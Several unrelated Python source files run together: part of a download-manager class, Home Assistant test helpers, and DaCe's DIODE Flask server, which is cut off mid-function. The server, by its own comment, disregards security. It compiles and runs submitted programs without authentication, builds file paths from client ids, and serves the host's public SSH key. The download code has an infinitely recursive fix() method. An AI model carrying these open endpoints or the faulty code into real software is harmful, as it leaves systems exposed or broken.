for m, n in __URL_NODE_PARAMS__.items(): if m in kwargs: if len(kwargs[m]) == 1: node[n] = kwargs[m][0] elif len(kwargs[m]) == iter_len: node[n] = kwargs[m][i] else: raise Exception('IterLenError') pack_yield.append(node) if wait is False: self.__batch_thread__ = threading.Thread(target=self.__batchAdd__, args=(pack_yield, )) self.__batch_thread__.start() else: self.__batchAdd__(pack_yield) def addNode(self, *args, **kwargs): self.url.addNode(*args, **kwargs) if self.file.size == -1: self.file.size = self.url.getFileSize() if not self.file.name: self.file.name = self.url.getFileName() if not self.file.name: self.file = File(name=self.file.name, path=self.file.path, size=self.url.getFileSize(), block_size=self.file.BLOCK_SIZE) def delete(self, url=None, urlid=None): if urlid: self.url.delete(urlid) elif url: for i in self.url.dict.values(): if i.url == url: self.url.delete(i.id) def insert(self, begin, end, Urlid=None, thread_num=1): put_urlid = self.globalprog.allotter.assignUrlid() if not Urlid else Urlid if put_urlid != -1: self.globalprog.fs.insert(begin, end) for i in self.globalprog.allotter.splitRange((begin, end), thread_num): self.globalprog.insert(put_urlid, i[0], i[1]) def manualRun(self): if not self.globalprog.progresses: raise Exception('EmptyEqueue') self.globalprog.run() def getFileName(self): return self.file.name if self.file.name else None def getFileSize(self): return self.url.getFileSize() def getUrls(self): return self.url.dict def getInsSpeed(self): return self.globalprog.getInsSpeed() def getAvgSpeed(self): return self.globalprog.getAvgSpeed() def getLeft(self): return self.globalprog.getLeft() def getOnlines(self): return self.globalprog.getOnlines() def getConnections(self): return self.globalprog.getConnections() def getBlockMap(self): return self.globalprog.getMap() def getSegsValue(self): return self.globalprog.fs.getvalue() def getSegsSize(self): return self.globalprog.fs.getStorageSize() def getUrlsThread(self): return self.globalprog.allotter.getUrlsThread() def __config_params__(self): return {'filename': 'file.name', 'filepath': 'file.path', 'block_size': 'file.BLOCK_SIZE', 'max_conn': 'url.max_conn', 'buffer_size': 'file.buffer_size', 'max_speed': 'url.max_speed', } def config(self, **kwargs): for i, j in self.__config_params__().items(): if i in kwargs: objs = j.split('.') if len(objs) == 1: setattr(self, objs[0], kwargs[i]) else: attr = getattr(self, objs[0]) for m in objs[1:-1]: attr = getattr(attr, m) setattr(attr, objs[-1], kwargs[i]) def close(self): if not self.globalprog.isEnd(): raise Exception('DownloadNotComplete') if os.path.isfile(os.path.join(self.file.path, self.file.name + '.nbdler')): os.remove(os.path.join(self.file.path, self.file.name + '.nbdler')) def fileVerify(self, sample_size=4096): self.install(GlobalProgress(self, MANUAL)) if sample_size > self.file.BLOCK_SIZE: raise Exception('ParamsError') for i, j in self.globalprog.progresses.items(): Range = segToRange(i) self.insert(Range[1] - sample_size, Range[1]) self.manualRun() while not self.globalprog.isEnd(): time.sleep(0.1) all_value = self.globalprog.fs.getvalue() damage = [] with open(os.path.join(self.file.path, self.file.name), 'rb') as f: for i, j in all_value.items(): Range = segToRange(i) f.seek(Range[0]) if f.read(sample_size) != j: damage.append(i) self.uninstall() return damage def fix(self, segs): self.fix(segs) def sampleUrls(self, sample_size=1024 * 1024): import random self.url.matchSize() if self.file.size < sample_size: sample_size = self.file.size _begin = random.randint(0, self.file.size - sample_size) _end = _begin + sample_size global_dict = {} for i in self.url.getUrls().keys(): glob = GlobalProgress(self, MANUAL) global_dict[i] = glob self.install(glob) self.insert(_begin, _end, i) self.manualRun() while True: for i in global_dict.values(): if not i.isEnd(): break else: break time.sleep(0.1) samples = {} for i, j in global_dict.items(): i.fs.seek(_begin) samples[i] = i.fs.read(sample_size) sample_type = [] sample_type.append([samples.keys()[0]]) for i, j in samples.items(): for m in sample_type: if i not in m: if samples[i] == samples[m[0]]: m.append(i) break else: break else: sample_type.append([i]) self.uninstall() return sample_type def run(self): if self.__new_project__: self.file.makeFile() self.globalprog.allotter.makeBaseConn() self.globalprog.save() self.globalprog.run() def pause(self): self.globalprog.pause() def isEnd(self): return self.globalprog.isEnd() def unpack(self, packet): Packer.unpack(self, packet) self.__new_project__ = False def __packet_params__(self): return ['url', 'file', '__auto_global__']
common.py
"""Test the helper method for writing tests.""" import asyncio import os import sys from datetime import timedelta from unittest import mock from unittest.mock import patch from io import StringIO import logging import threading from contextlib import contextmanager from homeassistant import core as ha, loader from homeassistant.bootstrap import ( setup_component, async_prepare_setup_component) from homeassistant.helpers.entity import ToggleEntity from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.dt as date_util import homeassistant.util.yaml as yaml from homeassistant.const import ( STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED, EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE, ATTR_DISCOVERED, SERVER_PORT) from homeassistant.components import sun, mqtt _TEST_INSTANCE_PORT = SERVER_PORT _LOGGER = logging.getLogger(__name__) def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config dir.""" if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() hass = loop.run_until_complete(async_test_home_assistant(loop)) # FIXME should not be a daemon. Means hass.stop() not called in teardown stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() loop.close() stop_event.set() threading.Thread(name="LoopThread", target=run_loop, daemon=True).start() orig_start = hass.start orig_stop = hass.stop @patch.object(hass.loop, 'run_forever') @patch.object(hass.loop, 'close') def start_hass(*mocks): """Helper to start hass.""" orig_start() hass.block_till_done() def stop_hass(): """Stop hass.""" orig_stop() stop_event.wait() hass.start = start_hass hass.stop = stop_hass return hass @asyncio.coroutine def async_test_home_assistant(loop): """Return a Home Assistant object pointing at test config dir.""" loop._thread_ident = threading.get_ident() hass = ha.HomeAssistant(loop) hass.config.location_name = 'test home' hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.time_zone = date_util.get_time_zone('US/Pacific') hass.config.units = METRIC_SYSTEM hass.config.skip_pip = True if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS: yield from loop.run_in_executor(None, loader.prepare, hass) hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start @asyncio.coroutine def mock_async_start(): with patch.object(loop, 'add_signal_handler'), \ patch('homeassistant.core._async_create_timer'), \ patch.object(hass, '_async_tasks_cleanup', return_value=None): yield from orig_start() hass.async_start = mock_async_start return hass def get_test_instance_port(): """Return unused port for running test instance. The socket that holds the default port does not get released when we stop HA in a different test case. Until I have figured out what is going on, let's run each test on a different port. """ global _TEST_INSTANCE_PORT _TEST_INSTANCE_PORT += 1 return _TEST_INSTANCE_PORT def mock_service(hass, domain, service): """Setup a fake service. Return a list that logs all calls to fake service. """ calls = [] @ha.callback def mock_service(call): calls.append(call) # pylint: disable=unnecessary-lambda hass.services.register(domain, service, mock_service) return calls def fire_mqtt_message(hass, topic, payload, qos=0): """Fire the MQTT message.""" hass.bus.fire(mqtt.EVENT_MQTT_MESSAGE_RECEIVED, { mqtt.ATTR_TOPIC: topic, mqtt.ATTR_PAYLOAD: payload, mqtt.ATTR_QOS: qos, }) def fire_time_changed(hass, time): """Fire a time changes event.""" hass.bus.fire(EVENT_TIME_CHANGED, {'now': time}) def fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.fire(EVENT_PLATFORM_DISCOVERED, { ATTR_SERVICE: service, ATTR_DISCOVERED: info }) def ensure_sun_risen(hass): """Trigger sun to rise if below horizon.""" if sun.is_on(hass): return fire_time_changed(hass, sun.next_rising_utc(hass) + timedelta(seconds=10)) def ensure_sun_set(hass): """Trigger sun to set if above horizon.""" if not sun.is_on(hass): return fire_time_changed(hass, sun.next_setting_utc(hass) + timedelta(seconds=10)) def load_fixture(filename): """Helper to load a fixture.""" path = os.path.join(os.path.dirname(__file__), 'fixtures', filename) with open(path) as fptr: return fptr.read() def mock_state_change_event(hass, new_state, old_state=None): """Mock state change envent.""" event_data = { 'entity_id': new_state.entity_id, 'new_state': new_state, } if old_state: event_data['old_state'] = old_state hass.bus.fire(EVENT_STATE_CHANGED, event_data) def mock_http_component(hass): """Mock the HTTP component.""" hass.http = mock.MagicMock() hass.config.components.append('http') hass.http.views = {} def mock_register_view(view): """Store registered view.""" if isinstance(view, type): # Instantiate the view, if needed view = view(hass) hass.http.views[view.name] = view hass.http.register_view = mock_register_view def mock_mqtt_component(hass): """Mock the MQTT component.""" with mock.patch('homeassistant.components.mqtt.MQTT') as mock_mqtt: setup_component(hass, mqtt.DOMAIN, { mqtt.DOMAIN: { mqtt.CONF_BROKER: 'mock-broker', } }) return mock_mqtt class MockModule(object): """Representation of a fake module.""" # pylint: disable=invalid-name def __init__(self, domain=None, dependencies=None, setup=None, requirements=None, config_schema=None, platform_schema=None, async_setup=None): """Initialize the mock module.""" self.DOMAIN = domain self.DEPENDENCIES = dependencies or [] self.REQUIREMENTS = requirements or [] self._setup = setup if config_schema is not None: self.CONFIG_SCHEMA = config_schema if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if async_setup is not None: self.async_setup = async_setup def setup(self, hass, config): """Setup the component. We always define this mock because MagicMock setups will be seen by the executor as a coroutine, raising an exception. """ if self._setup is not None: return self._setup(hass, config) return True class MockPlatform(object): """Provide a fake platform.""" # pylint: disable=invalid-name def __init__(self, setup_platform=None, dependencies=None, platform_schema=None): """Initialize the platform.""" self.DEPENDENCIES = dependencies or [] self._setup_platform = setup_platform if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema def setup_platform(self, hass, config, add_devices, discovery_info=None): """Setup the platform.""" if self._setup_platform is not None: self._setup_platform(hass, config, add_devices, discovery_info) class MockToggleDevice(ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state): """Initialize the mock device.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the device if any.""" self.calls.append(('name', {})) return self._name @property def state(self): """Return the name of the device if any.""" self.calls.append(('state', {})) return self._state @property def is_on(self): """Return true if device is on.""" self.calls.append(('is_on', {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the device on.""" self.calls.append(('turn_on', kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the device off.""" self.calls.append(('turn_off', kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None elif method is None: return self.calls[-1] else: try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(list(files_dict.keys()), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if fname in files_dict: _LOGGER.debug('patch_yaml_files match %s', fname) res = StringIO(files_dict[fname]) setattr(res, 'name', fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug('patch_yaml_files end match %s: %s', ends, fname) res = StringIO(files_dict[ends]) setattr(res, 'name', fname) return res # Fallback for hass.components (i.e. services.yaml) if 'homeassistant/components' in fname: _LOGGER.debug('patch_yaml_files using real file: %s', fname) return open(fname, encoding='utf-8') # Not found raise FileNotFoundError('File not found: {}'.format(fname)) return patch.object(yaml, 'open', mock_open_f, create=True) def mock_coro(return_value=None): """Helper method to return a coro that returns a value.""" @asyncio.coroutine def coro(): """Fake coroutine.""" return return_value return coro @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. It can be automatically determined most of the time Use as a context manager aroung bootstrap.setup_component with assert_setup_component(0) as result_config: setup_component(hass, start_config, domain) # using result_config is optional """ config = {} @asyncio.coroutine def mock_psc(hass, config_input, domain): """Mock the prepare_setup_component to capture config.""" res = yield from async_prepare_setup_component( hass, config_input, domain) config[domain] = None if res is None else res.get(domain) _LOGGER.debug('Configuration for %s, Validated: %s, Original %s', domain, config[domain], config_input.get(domain)) return res assert isinstance(config, dict) with patch('homeassistant.bootstrap.async_prepare_setup_component', mock_psc): yield config if domain is None: assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}' .format(list(config.keys()))) domain = list(config.keys())[0] res = config.get(domain) res_len = 0 if res is None else len(res) assert res_len == count, 'setup_component failed, expected {} got {}: {}' \ .format(count, res_len, res)
diode_server.py
#!flask/bin/python # Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved. import aenum import dace import dace.serialize import dace.frontend.octave.parse as octave_frontend from dace.codegen import codegen from diode.DaceState import DaceState from dace.transformation.optimizer import SDFGOptimizer from dace.transformation.transformation import PatternTransformation from dace.sdfg.nodes import LibraryNode import inspect from flask import Flask, Response, request, redirect, url_for, abort, jsonify, send_from_directory, send_file import json import copy import multiprocessing import re from diode.remote_execution import AsyncExecutor import traceback import os import pydoc import threading import queue import time app = Flask(__name__) # Prepare a whitelist of DaCe enumeration types enum_list = [ typename for typename, dtype in inspect.getmembers(dace.dtypes, inspect.isclass) if issubclass(dtype, aenum.Enum) ] es_ref = [] remote_execution = False config_lock = threading.Lock() RUNNING_TIMEOUT = 3 class ConfigCopy: """ Copied Config for passing by-value """ def __init__(self, config_values): self._config = config_values def get(self, *key_hierarchy): current_conf = self._config for key in key_hierarchy: current_conf = current_conf[key] return current_conf def get_bool(self, *key_hierarchy): from dace.config import _env2bool res = self.get(*key_hierarchy) if isinstance(res, bool): return res return _env2bool(str(res)) def set(self, *key_hierarchy, value=None, autosave=False): raise Exception("ConfigCopy does not allow setting values!") def save(self, path=None): """ Nonstatic version of Config::save() """ if path is None: path = Config._cfg_filename # Write configuration file with open(path, 'w') as f: import yaml yaml.dump(self._config, f, default_flow_style=False) class ExecutorServer: """ Implements a server scheduling execution of dace programs """ def __init__(self): self._command_queue = queue.Queue() # Fast command queue. Must be polled often (< 30 ms response time) self._executor_queue = queue.Queue() # Run command queue. Latency not critical _self = self def helper(): _self.loop() def ehelper(): _self.executorLoop() self._task_dict = {} self._run_num = 0 self._running = True self._thread = threading.Thread(target=helper, daemon=True) self._thread.start() self._executor_thread = threading.Thread(target=ehelper, daemon=True) self._executor_thread.start() self._current_runs = {} self._orphaned_runs = {} self._oplock = threading.Lock() self._run_cv = threading.Condition() # Used to trickle run tasks through (as the tasks are run in a thread) self._slot_available = True # True if the target machine has a slot for running a program self._perfdata_available = {} # Dict mapping client_id => .can-path self._ticket_counter = 0 self._command_results = {} # Dict mapping ticket => command result def executorLoop(self): while self._running: self.consume_programs() def loop(self): while self._running: self.consume() def waitForCommand(self, ticket): while True: try: with self._oplock: ret = self._command_results[ticket] del self._command_results[ticket] except: time.sleep(2) continue return ret def addCommand(self, cmd): with self._oplock: cmd['ticket'] = self._ticket_counter self._ticket_counter += 1 self._command_queue.put(cmd) print("Added command to queue") return cmd['ticket'] def consume_programs(self): try: cmd = self._executor_queue.get(timeout=3) if cmd['cmd'] == "run": while True: with self._run_cv: if self._slot_available: break import time time.sleep(0.5) with self._run_cv: self._slot_available = False print("Running task") self._task_dict[cmd['index']]['state'] = 'running' runner = self.run( cmd['cot'], { 'index': cmd['index'], 'config_path': cmd['config_path'], 'client_id': cmd['cid'], 'reset-perfdata': cmd['reset-perfdata'], 'perfopts': cmd['opt']['perfopts'] }) print("Wait for oplock") with self._oplock: self._current_runs[cmd['cid']] = runner import time # Wait a predefined time for clients to catch up on the outputs time.sleep(RUNNING_TIMEOUT) with self._oplock: run_locally = True try: x = self._current_runs[cmd['cid']] except: run_locally = False if run_locally: print("running locally") def tmp(): with self._oplock: del self._current_runs[cmd['cid']] try: c = self._orphaned_runs[cmd['cid']] except: self._orphaned_runs[cmd['cid']] = [] self._orphaned_runs[cmd['cid']].append([]) print("Starting runner") for x in runner(): self._orphaned_runs[cmd['cid']][-1] += x # Because this holds locks (and the output should be generated even if nobody asks for it immediately), this is run when the timeout for direct interception expires tmp() elif cmd['cmd'] == 'control': # Control operations that must be synchronous with execution (e.g. for cleanup, storage operations) with self._oplock: self._task_dict[cmd['index']]['state'] = 'running' if cmd['operation'] == 'startgroup': pass elif cmd['operation'] == 'remove_group': pass elif cmd['operation'] == 'endgroup': pass with self._oplock: del self._task_dict[cmd['index']] except queue.Empty: return def consume(self): try: cmd = self._command_queue.get(timeout=3) if isinstance(cmd, str): pass else: command = cmd['cmd'] print("Got command " + command) except queue.Empty: return def getExecutionOutput(self, client_id): import time ret = None err_count = 0 while ret is None: with self._oplock: try: ret = self._current_runs[client_id] del self._current_runs[client_id] except: err_count += 1 if err_count < 20: # Give 20 seconds of space for compilation and distribution time.sleep(1) continue def egen(): yield "ERROR: Failed to get run reference" return egen return ret def stop(self): self._running = False def lock(self): self._oplock.acquire() def unlock(self): self._oplock.release() @staticmethod def getPerfdataDir(client_id): if not os.path.isdir("perfdata-dir/"): os.mkdir("perfdata-dir") tpath = "perfdata-dir/" + client_id try: os.mkdir(tpath) except: pass perf_tmp_dir = tpath return perf_tmp_dir def addRun(self, client_id, compilation_output_tuple, more_options): config_path = "./client_configs/" + client_id + ".conf" if not os.path.isdir("./client_configs/"): os.mkdir("./client_configs/") if not os.path.isfile(config_path): # Config not (yet) available, load default and copy with config_lock: from dace.config import Config Config.load() Config.save(config_path) if isinstance(compilation_output_tuple, str): # Group command gc = compilation_output_tuple val = { 'cid': client_id, 'cmd': 'control', 'index': self._run_num, 'operation': None, 'config_path': config_path, 'state': "pending" } if gc == "start": val['operation'] = 'startgroup' elif gc == "end": val['operation'] = 'endgroup' else: def g(): yield '{ "error": "Unknown group operation" }' return g with self._oplock: self._executor_queue.put(val) self._task_dict[self._run_num] = val self._run_num += 1 return with self._oplock: val = { 'index': self._run_num, 'type': 'run', 'cid': client_id, 'config_path': config_path, 'cmd': 'run', 'cot': compilation_output_tuple, 'opt': more_options, 'state': 'pending', 'reset-perfdata': False } self._executor_queue.put(val) self._task_dict[self._run_num] = val self._run_num += 1 def error_gen(): yield '{ "error": "Run was scheduled. Please poll until ready or longpoll." }' return error_gen def run(self, cot, options): print("=> Run called") print("Options: " + str(options)) compilation_output_tuple = cot runindex = options['index'] config_path = options['config_path'] sdfgs, code_tuples, dace_state = compilation_output_tuple # Passes output through HTTP1.1 streaming (using yield) def runner(): print("Trying to get lock") with self._run_cv: yield "Run starting\n" with config_lock: from dace.config import Config Config.load(config_path) # Copy the config - this allows releasing the config lock # without suffering from potential side effects copied_config = ConfigCopy(Config._config) self._slot_available = False dace_state.set_is_compiled(False) terminal_queue = multiprocessing.Queue() async_executor = AsyncExecutor(remote=remote_execution) async_executor.autoquit = True async_executor.executor.output_queue = terminal_queue async_executor.executor.set_config(copied_config) async_executor.run_async(dace_state) async_executor.to_proc_message_queue.put("forcequit") while async_executor.running_proc.is_alive(): try: new = terminal_queue.get(timeout=1) yield new except: # Check if the sub-process is still running continue # Flush remaining outputs while not terminal_queue.empty(): new = terminal_queue.get(timeout=1) yield new with self._oplock: # Delete from the tasklist del self._task_dict[runindex] # Output instrumentation report, if exists if (async_executor.running_proc.exitcode == 0 and dace_state.sdfg.is_instrumented()): report = dace_state.sdfg.get_latest_report() yield '\nInstrumentation report:\n%s\n\n' % report yield ('Run finished with exit code %d' % async_executor.running_proc.exitcode) self._slot_available = True return runner @app.route('/') def redirect_base(): return redirect(url_for("index", path="index.html"), code=301) @app.route('/webclient/<path:path>', methods=['GET']) def index(path): """ This is an http server (on the same port as the REST API). It serves the files from the 'webclient'-directory to user agents. Note: This is NOT intended for production environments and security is disregarded! """ return send_from_directory(os.path.join(os.path.dirname(os.path.abspath(__file__)), "webclient"), path) @app.route('/dace/api/v1.0/getPubSSH/', methods=['GET']) def getPubSSH(): try: with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as f: key = f.read() return jsonify({"pubkey": key}) except: print("Failed to open keyfile") traceback.print_exc() return jsonify({"pubkey": "0"}) @app.route('/dace/api/v1.0/getEnum/<string:name>', methods=['GET']) def getEnum(name): """ Helper function to enumerate available values for `ScheduleType`. Returns: enum: List of string-representations of the values in the enum """ valid_params = enum_list if name not in valid_params: # To protect against arbitrary code execution, this request is refused print("Enum type '" + str(name) + "' is not in Whitelist") abort(400) return jsonify({'enum': [str(e).split(".")[-1] for e in getattr(dace.dtypes, name)]}) @app.route('/dace/api/v1.0/getLibImpl/<string:name>', methods=['GET']) def get_library_implementations(name): """ Helper function to enumerate available implementations for a given library node. Returns: enum: List of string-representations of implementations """ cls = pydoc.locate(name) if cls is None: return jsonify([]) return jsonify(list(cls.implementations.keys())) @app.route('/dace/api/v1.0/expand/', methods=['POST']) def expand_node_or_sdfg(): """ Performs expansion of a single library node or an entire SDFG. Fields: sdfg (required): SDFG as JSON nodeid (not required): A list of: [SDFG ID, state ID, node ID] """ try: sdfg = dace.SDFG.from_json(request.json['sdfg']) except KeyError: return jsonify({'error': 'SDFG not given'}) try: sdfg_id, state_id, node_id = request.json['nodeid'] except KeyError: sdfg_id, state_id, node_id = None, None, None if sdfg_id is None: sdfg.expand_library_nodes() else: context_sdfg = sdfg.sdfg_list[sdfg_id] state = context_sdfg.node(state_id) node = state.node(node_id) if isinstance(node, LibraryNode): node.expand(context_sdfg, state) else: return jsonify({'error': 'The given node is not a library node'}) return jsonify({'sdfg': sdfg.to_json()}) def collect_all_SDFG_nodes(sdfg): ret = [] for sid, state in enumerate(sdfg.nodes()): for nid, node in enumerate(state.nodes()): ret.append(('s' + str(sid) + '_' + str(nid), node)) return ret def split_nodeid_in_state_and_nodeid(nodeid): match = re.match(r"s(\d+)_(\d+)", nodeid) if match: ids = match.groups() return int(ids[0]), int(ids[1]) else: match = re.match(r"dummy_(\d+)", nodeid) if match: ids = match.groups() return int(ids[0]), None else: raise ValueError("Node ID " + nodeid + " has the wrong form") return None def properties_to_json_list(props): ret = [] for x, val in props: try: typestr = x.dtype.__name__ except: # Try again, it might be an enum try: typestr = x.enum.__name__ except: typestr = 'None' # Special case of CodeProperty if isinstance(x, dace.properties.CodeProperty): typestr = "CodeProperty" if val is None: continue val = x.to_string(val) # Special case of DebugInfoProperty: Transcribe to object (this is read-only) if isinstance(x, dace.properties.DebugInfoProperty): typestr = "DebugInfo" if val is None: continue nval = { "filename": val.filename, "start_line": val.start_line, "end_line": val.end_line, "start_col": val.start_column, "end_col": val.end_column } val = json.dumps(nval) ret.append({ "name": str(x.attr_name), "desc": str(x.desc), "type": typestr, "default": str(x.default), "value": str(val) }) return ret def applySDFGProperty(sdfg, property_element, step=None): try: prop_step = int(property_element['step']) except: print("[Warning] Prop step was not provided") prop_step = 0 print("applySDFGProperty: step " + str(step) + ", prop_step: " + str(prop_step)) if step is not None and prop_step != step: # Step mismatch; ignore return sdfg sid = int(property_element['state_id']) nid = int(property_element['node_id']) node = sdfg.node(sid).node(nid) for prop in property_element['params']: dace.serialize.set_properties_from_json(node, prop, context=sdfg) return sdfg def applySDFGProperties(sdfg, properties, step=None): for x in properties: applySDFGProperty(sdfg, x, step) return sdfg def applyOptPath(sdfg, optpath, useGlobalSuffix=True, sdfg_props=None): # Iterate over the path, applying the transformations global_counter = {} sdfg_props = sdfg_props or [] step = 0 for x in optpath: optimizer = SDFGOptimizer(sdfg, inplace=True) name = x['name'] classname = name[:name.index('$')] if name.find('$') >= 0 else name transformation = next(t for t in PatternTransformation.subclasses_recursive() if t.__name__ == classname) matching = optimizer.get_pattern_matches(patterns=[transformation]) # Apply properties (will automatically apply by step-matching) sdfg = applySDFGProperties(sdfg, sdfg_props, step) for pattern in matching: name = type(pattern).__name__ tsdfg = sdfg.sdfg_list[pattern.sdfg_id] if useGlobalSuffix: if name in global_counter: global_counter[name] += 1 else: global_counter[name] = 0 tmp = global_counter[name] if tmp > 0: name += "$" + str(tmp) if name == x['name']: #for prop in x['params']['props']: #if prop['name'] == 'subgraph': continue #set_properties_from_json(pattern, prop, sdfg) dace.serialize.set_properties_from_json(pattern, x['params']['props'], context=sdfg) pattern.apply_pattern(tsdfg) if not useGlobalSuffix: break step += 1 sdfg = applySDFGProperties(sdfg, sdfg_props, step) return sdfg def create_DaceState(code, sdfg_dict, errors): dace_state = None try: dace_state = DaceState(code, "fake.py", remote=remote_execution) for x in dace_state.sdfgs: name, sdfg = x sdfg_dict[name] = sdfg return dace_state except SyntaxError as se: # Syntax error errors.append({'type': "SyntaxError", 'line': se.lineno, 'offset': se.offset, 'text': se.text, 'msg': se.msg}) except ValueError as ve: # DACE-Specific error tb = traceback.format_exc() errors.append({'type': "ValueError", 'stringified': str(ve), 'traceback': tb}) except Exception as ge: # Generic exception tb = traceback.format_exc() errors.append({'type': ge.__class__.__name__, 'stringified': str(ge), 'traceback': tb}) return dace_state def compileProgram(request, language, perfopts=None): if not request.json or (('code' not in request.json) and ('sdfg' not in request.json)): print("[Error] No input code provided, cannot continue") abort(400) errors = [] try: optpath = request.json['optpath'] except: optpath = None try: sdfg_props = request.json['sdfg_props'] except: sdfg_props = None if perfopts is None: try: perf_mode = request.json['perf_mode'] except: perf_mode = None else: #print("Perfopts: " + str(perfopts)) perf_mode = perfopts client_id = request.json['client_id'] sdfg_dict = {} sdfg_eval_order = [] with config_lock: # Lock the config - the config may be modified while holding this lock, but the config MUST be restored. from dace.config import Config config_path = "./client_configs/" + client_id + ".conf" if os.path.isfile(config_path): Config.load(config_path) else: Config.load() dace_state = None in_sdfg = None if "sdfg" in request.json: in_sdfg = request.json['sdfg'] if isinstance(in_sdfg, list): if len(in_sdfg) > 1: # TODO: Allow multiple sdfg inputs raise NotImplementedError("More than 1 SDFG provided") in_sdfg = in_sdfg[0] if isinstance(in_sdfg, str): in_sdfg = json.loads(in_sdfg) if isinstance(in_sdfg, dict): # Generate callbacks (needed for elements referencing others) def loader_callback(name: str): # Check if already available and if yes, return it if name in sdfg_dict: return sdfg_dict[name] # Else: This function has to recreate the given sdfg sdfg_dict[name] = dace.SDFG.from_json(in_sdfg[name], {'sdfg': None, 'callback': loader_callback}) sdfg_eval_order.append(name) return sdfg_dict[name] for k, v in in_sdfg.items(): # Leave it be if the sdfg was already created # (this might happen with SDFG references) if k in sdfg_dict: continue if isinstance(v, str): v = json.loads(v) sdfg_dict[k] = dace.SDFG.from_json(v, {'sdfg': None, 'callback': loader_callback}) sdfg_eval_order.append(k) else: in_sdfg = dace.SDFG.from_json(in_sdfg) sdfg_dict[in_sdfg.name] = in_sdfg else: print("Using code to compile") code = request.json['code'] if (isinstance(code, list)): if len(code) > 1: print("More than 1 code file provided!") abort(400) code = code[0] if language == "octave": statements = octave_frontend.parse(code, debug=False) statements.provide_parents() statements.specialize() sdfg = statements.generate_code() sdfg.set_sourcecode(code, "matlab") elif language == "dace": dace_state = create_DaceState(code, sdfg_dict, errors) # The DaceState uses the variable names in the dace code. This is not useful enough for us, so we translate copied_dict = {} for k, v in sdfg_dict.items(): copied_dict[v.name] = v sdfg_dict = copied_dict if len(errors) == 0: if optpath is not None: for sdfg_name, op in optpath.items(): try: sp = sdfg_props[sdfg_name] except: # In any error case, just ignore the properties sp = None print("Applying opts for " + sdfg_name) print("Dict: " + str(sdfg_dict.keys())) sdfg_dict[sdfg_name] = applyOptPath(sdfg_dict[sdfg_name], op, sdfg_props=sp) code_tuple_dict = {} # Deep-copy the SDFG (codegen may change the SDFG it operates on) codegen_sdfgs = copy.deepcopy(sdfg_dict) codegen_sdfgs_dace_state = copy.deepcopy(sdfg_dict) if len(errors) == 0: if sdfg_eval_order: sdfg_eval = [(n, codegen_sdfgs[n]) for n in reversed(sdfg_eval_order)] else: sdfg_eval = codegen_sdfgs.items() for n, s in sdfg_eval: try: if Config.get_bool('diode', 'general', 'library_autoexpand'): s.expand_library_nodes() code_tuple_dict[n] = codegen.generate_code(s) except dace.sdfg.NodeNotExpandedError as ex: code_tuple_dict[n] = [str(ex)] except Exception: # Forward exception to output code code_tuple_dict[n] = ['Code generation failed:\n' + traceback.format_exc()] if dace_state is None: if "code" in request.json: in_code = request.json['code'] else: in_code = "" dace_state = DaceState(in_code, "tmp.py", remote=remote_execution) dace_state.set_sdfg(list(codegen_sdfgs_dace_state.values())[0], list(codegen_sdfgs_dace_state.keys())[0]) if len(dace_state.errors) > 0: print("ERRORS: " + str(dace_state.errors)) errors.extend(dace_state.errors) # The config won't save back on its own, and we don't want it to - these changes are transient if len(errors) > 0: return errors # Only return top-level SDFG return ({k: v for k, v in sdfg_dict.items() if v.parent is None}, code_tuple_dict, dace_state) #return sdfg_dict, code_tuple_dict, dace_state def get_transformations(sdfgs): opt_per_sdfg = {} for sdfg_name, sdfg in sdfgs.items(): opt = SDFGOptimizer(sdfg) ptrns = opt.get_pattern_matches() optimizations = [] for p in ptrns: label = type(p).__name__ nodeids = [] properties = [] if p is not None: sdfg_id = p.sdfg_id sid = p.state_id nodes = list(p.subgraph.values()) for n in nodes: nodeids.append([sdfg_id, sid, n]) properties = dace.serialize.all_properties_to_json(p) optimizations.append({'opt_name': label, 'opt_params': properties, 'affects': nodeids, 'children': []}) opt_per_sdfg[sdfg_name] = {'matching_opts': optimizations} return opt_per_sdfg @app.route("/dace/api/v1.0/dispatcher/<string:op>/", methods=['POST']) def execution_queue_query(op): es = es_ref[0] if op == "list": # List the currently waiting tasks retlist = [] for key, val in es._orphaned_runs.items(): tmp = [''.join(x) for x in val] for x in tmp: d = {} d['index'] = '(done)' d['type'] = 'orphan' d['client_id'] = key d['state'] = 'orphaned' d['output'] = str(x) retlist.append(d) for key, val in es._task_dict.items(): d = {} if val['cmd'] == 'run': d['index'] = key d['type'] = 'run' d['client_id'] = val['cid'] d['options'] = val['opt'] d['state'] = val['state'] elif val['cmd'] == 'control': d['index'] = key d['type'] = 'command' d['client_id'] = val['cid'] d['options'] = val['operation'] d['state'] = val['state'] retlist.append(d) ret = 